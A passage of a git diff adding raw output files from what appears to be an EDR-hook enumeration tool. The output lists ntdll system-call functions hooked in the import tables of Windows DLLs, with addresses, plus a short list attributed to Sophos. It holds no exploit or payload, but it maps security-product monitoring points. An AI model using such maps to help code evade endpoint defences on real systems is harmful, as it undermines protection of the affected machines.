+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySymbolicLinkObject is hooked to 0x00007ff9e132fba0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryMultipleValueKey is hooked to 0x00007ff9e132fa60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenPrivateNamespace is hooked to 0x00007ff9e132f4c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeletePrivateNamespace is hooked to 0x00007ff9e132ea80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreatePrivateNamespace is hooked to 0x00007ff9e132e6e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtDuplicateObject is hooked to 0x00007ff9e132d750
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtResetEvent is hooked to 0x00007ff9e132ff00
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryEvent is hooked to 0x00007ff9e132da90
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetInformationProcess is hooked to 0x00007ff9e132d350
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLoadKeyEx is hooked to 0x00007ff9e132f100
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenProcessTokenEx is hooked to 0x00007ff9e132d5d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateWnfStateName is hooked to 0x00007ff9e132e940
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteWnfStateName is hooked to 0x00007ff9e132eae0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSecurityObject is hooked to 0x00007ff9e13304e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtUnmapViewOfSection is hooked to 0x00007ff9e132d510
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySecurityAttributesToken is hooked to 0x00007ff9e132fb20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetCachedSigningLevel is hooked to 0x00007ff9e132ede0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtYieldExecution is hooked to 0x00007ff9e132d890
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateLocallyUniqueId is hooked to 0x00007ff9e132dde0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheck is hooked to 0x00007ff9e132cfd0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByType is hooked to 0x00007ff9e132dc20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultList is hooked to 0x00007ff9e132dc40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationToken is hooked to 0x00007ff9e1330360
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAdjustPrivilegesToken is hooked to 0x00007ff9e132d7f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAdjustGroupsToken is hooked to 0x00007ff9e132dd40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegeCheck is hooked to 0x00007ff9e132f6c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckAndAuditAlarm is hooked to 0x00007ff9e132d4f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeAndAuditAlarm is hooked to 0x00007ff9e132daf0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultListAndAuditAlarm is hooked to 0x00007ff9e132dc60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultListAndAuditAlarmByHandle is hooked to 0x00007ff9e132dc80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenObjectAuditAlarm is hooked to 0x00007ff9e132f480
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegeObjectAuditAlarm is hooked to 0x00007ff9e132f6e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCloseObjectAuditAlarm is hooked to 0x00007ff9e132d730
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteObjectAuditAlarm is hooked to 0x00007ff9e132ea60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegedServiceAuditAlarm is hooked to 0x00007ff9e132f700
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtImpersonateAnonymousToken is hooked to 0x00007ff9e132ef60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFilterToken is hooked to 0x00007ff9e132ec60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetCachedSigningLevel is hooked to 0x00007ff9e1330120
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLockVirtualMemory is hooked to 0x00007ff9e132f180
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtUnlockVirtualMemory is hooked to 0x00007ff9e1330960
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtReadVirtualMemory is hooked to 0x00007ff9e132d7b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtProtectVirtualMemory is hooked to 0x00007ff9e132d9d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtWriteVirtualMemory is hooked to 0x00007ff9e132d710
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateVirtualMemory is hooked to 0x00007ff9e132d2d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateVirtualMemoryEx is hooked to 0x00007ff9e132de80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtFreeVirtualMemory is hooked to 0x00007ff9e132d390
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenEvent is hooked to 0x00007ff9e132d7d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetWriteWatch is hooked to 0x00007ff9e132ef40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtResetWriteWatch is hooked to 0x00007ff9e132ff20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationVirtualMemory is hooked to 0x00007ff9e13303c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateUserPhysicalPages is hooked to 0x00007ff9e132de20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFreeUserPhysicalPages is hooked to 0x00007ff9e132ed80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtMapUserPhysicalPages is hooked to 0x00007ff9e132f240
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenDirectoryObject is hooked to 0x00007ff9e132dad0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSymbolicLinkObject is hooked to 0x00007ff9e132e7e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateDirectoryObjectEx is hooked to 0x00007ff9e132e4c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLoadEnclaveData is hooked to 0x00007ff9e132f0a0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtTerminateEnclave is hooked to 0x00007ff9e13307c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateNamedPipeFile is hooked to 0x00007ff9e132e660
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLockFile is hooked to 0x00007ff9e132f120
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtUnlockFile is hooked to 0x00007ff9e1330940
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelIoFile is hooked to 0x00007ff9e132db60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelIoFileEx is hooked to 0x00007ff9e132e200
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelSynchronousIoFile is hooked to 0x00007ff9e132e220
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReadFileScatter is hooked to 0x00007ff9e132d590
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWriteFileGather is hooked to 0x00007ff9e132d330
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetEvent is hooked to 0x00007ff9e132d190
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtClearEvent is hooked to 0x00007ff9e132d790
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPulseEvent is hooked to 0x00007ff9e132f780
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSemaphore is hooked to 0x00007ff9e132e7c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenSemaphore is hooked to 0x00007ff9e132f540
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReleaseSemaphore is hooked to 0x00007ff9e132d110
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateMutant is hooked to 0x00007ff9e132e640
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateTimer2 is hooked to 0x00007ff9e132e840
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateTimer is hooked to 0x00007ff9e132e820
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenTimer is hooked to 0x00007ff9e132f5c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetTimerEx is hooked to 0x00007ff9e13305e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelTimer is hooked to 0x00007ff9e132dbe0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSignalAndWaitForSingleObject is hooked to 0x00007ff9e13306c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDelayExecution is hooked to 0x00007ff9e132d650
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtOpenProcess is hooked to 0x00007ff9e132d490
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCompareObjects is hooked to 0x00007ff9e132e320
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationObject is hooked to 0x00007ff9e132db40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSystemTime is hooked to 0x00007ff9e1330580
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryAuxiliaryCounterFrequency is hooked to 0x00007ff9e132f7a0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtConvertBetweenAuxiliaryCounterAndPerformanceCounter is hooked to 0x00007ff9e132e400
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtCreateThreadEx is hooked to 0x00007ff9e132e800
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtResumeThread is hooked to 0x00007ff9e132da10
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtTerminateThread is hooked to 0x00007ff9e132da30
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenThread is hooked to 0x00007ff9e132f5a0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSuspendThread is hooked to 0x00007ff9e1330780
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetContextThread is hooked to 0x00007ff9e132ee20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetContextThread is hooked to 0x00007ff9e1330160
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtQueueApcThreadEx2 is hooked to 0x00007ff9e132fca0
+ +-- 147 hooked functions.
+Checking ntdll.dll at InProcessClient64.dll IAT
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtOpenSection is hooked to 0x00007ff9e132d6b0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function *NtQueueApcThread is hooked to 0x00007ff9e132d870
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQuerySection is hooked to 0x00007ff9e132d9f0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtCallbackReturn is hooked to 0x00007ff9e132d070
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtGetNextThread is hooked to 0x00007ff9e132eee0
+ +-- 12 hooked functions.
+Checking ntdll.dll at ADVAPI32.dll IAT
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetInformationToken is hooked to 0x00007ff9e1330360
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCompareTokens is hooked to 0x00007ff9e132e360
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtDeleteKey is hooked to 0x00007ff9e132ea40
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenSymbolicLinkObject is hooked to 0x00007ff9e132f580
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQuerySymbolicLinkObject is hooked to 0x00007ff9e132fba0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtTraceControl is hooked to 0x00007ff9e1330860
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtRenameKey is hooked to 0x00007ff9e132fe40
+ |-- ADVAPI32.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- ADVAPI32.dll IAT to ntdll.dll of function *NtQuerySystemTime is hooked to 0x00007ff9e132db10
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryPerformanceCounter is hooked to 0x00007ff9e132d5f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateMutant is hooked to 0x00007ff9e132e640
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenPrivateNamespace is hooked to 0x00007ff9e132f4c0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreatePrivateNamespace is hooked to 0x00007ff9e132e6e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtAlpcQueryInformation is hooked to 0x00007ff9e132e0e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryMutant is hooked to 0x00007ff9e132fa80
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtReplaceKey is hooked to 0x00007ff9e132fe80
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSaveKey is hooked to 0x00007ff9e1330040
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSaveMergedKeys is hooked to 0x00007ff9e1330080
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenKeyEx is hooked to 0x00007ff9e132f3e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetInformationKey is hooked to 0x00007ff9e1330300
+ +-- 46 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at sechost.dll IAT
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenProcessTokenEx is hooked to 0x00007ff9e132d5d0
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- sechost.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- sechost.dll IAT to ntdll.dll of function *NtQueueApcThread is hooked to 0x00007ff9e132d870
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- sechost.dll IAT to ntdll.dll of function NtCancelIoFile is hooked to 0x00007ff9e132db60
+ |-- sechost.dll IAT to ntdll.dll of function NtTraceControl is hooked to 0x00007ff9e1330860
+ |-- sechost.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- sechost.dll IAT to ntdll.dll of function NtSetIntervalProfile is hooked to 0x00007ff9e1330400
+ |-- sechost.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryIntervalProfile is hooked to 0x00007ff9e132fa00
+ |-- sechost.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryPerformanceCounter is hooked to 0x00007ff9e132d5f0
+ |-- sechost.dll IAT to ntdll.dll of function NtSetEvent is hooked to 0x00007ff9e132d190
+ |-- sechost.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- sechost.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ +-- 21 hooked functions.
+Checking ntdll.dll at RPCRT4.dll IAT
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtWaitForAlertByThreadId is hooked to 0x00007ff9e1330a00
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlertThreadByThreadId is hooked to 0x00007ff9e132ddc0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAllocateUuids is hooked to 0x00007ff9e132de60
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAdjustPrivilegesToken is hooked to 0x00007ff9e132d7f0
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtQuerySystemTime is hooked to 0x00007ff9e132db10
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtPrivilegeCheck is hooked to 0x00007ff9e132f6c0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateResourceReserve is hooked to 0x00007ff9e132df60
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCancelMessage is hooked to 0x00007ff9e132dec0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeleteSecurityContext is hooked to 0x00007ff9e132e020
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateSecurityContext is hooked to 0x00007ff9e132dfa0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcConnectPortEx is hooked to 0x00007ff9e132df00
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcConnectPort is hooked to 0x00007ff9e132dee0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtImpersonateAnonymousToken is hooked to 0x00007ff9e132ef60
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateSectionView is hooked to 0x00007ff9e132df80
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreatePortSection is hooked to 0x00007ff9e132df40
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAllocateReserveObject is hooked to 0x00007ff9e132de00
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtSetIoCompletionEx is hooked to 0x00007ff9e1330440
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtQueueApcThreadEx is hooked to 0x00007ff9e132fc80
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtDeleteWnfStateName is hooked to 0x00007ff9e132eae0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateWnfStateName is hooked to 0x00007ff9e132e940
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenDirectoryObject is hooked to 0x00007ff9e132dad0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtDelayExecution is hooked to 0x00007ff9e132d650
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreatePort is hooked to 0x00007ff9e132df20
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcQueryInformation is hooked to 0x00007ff9e132e0e0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcSendWaitReceivePort is hooked to 0x00007ff9e132e140
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcAcceptConnectPort is hooked to 0x00007ff9e132dea0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeletePortSection is hooked to 0x00007ff9e132dfc0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeleteSectionView is hooked to 0x00007ff9e132e000
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDisconnectPort is hooked to 0x00007ff9e132e040
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcQueryInformationMessage is hooked to 0x00007ff9e132e100
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateNamedPipeFile is hooked to 0x00007ff9e132e660
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcSetInformation is hooked to 0x00007ff9e132e160
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcOpenSenderThread is hooked to 0x00007ff9e132e0c0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcOpenSenderProcess is hooked to 0x00007ff9e132e0a0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcImpersonateClientContainerOfPort is hooked to 0x00007ff9e132e060
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcImpersonateClientOfPort is hooked to 0x00007ff9e132e080
+ +-- 53 hooked functions.
+Checking ntdll.dll at bcrypt.dll IAT
+ |-- bcrypt.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- bcrypt.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- bcrypt.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ +-- 7 hooked functions.
+Checking ntdll.dll at FLTLIB.DLL IAT
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ +-- 4 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/sophos.txt b/enum/results_enum/sophos.txt
new file mode 100644
index 0000000..437c490
--- /dev/null
+++ b/enum/results_enum/sophos.txt
@@ -0,0 +1,44 @@
+[+] Listing ntdll Nt/Zw functions
+NtAllocateVirtualMemory is hooked
+NtAlpcConnectPort is hooked
+NtCreateProcessEx is hooked
+NtFreeVirtualMemory is hooked
+NtMapViewOfSection is hooked
+NtProtectVirtualMemory is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtSetContextThread is hooked
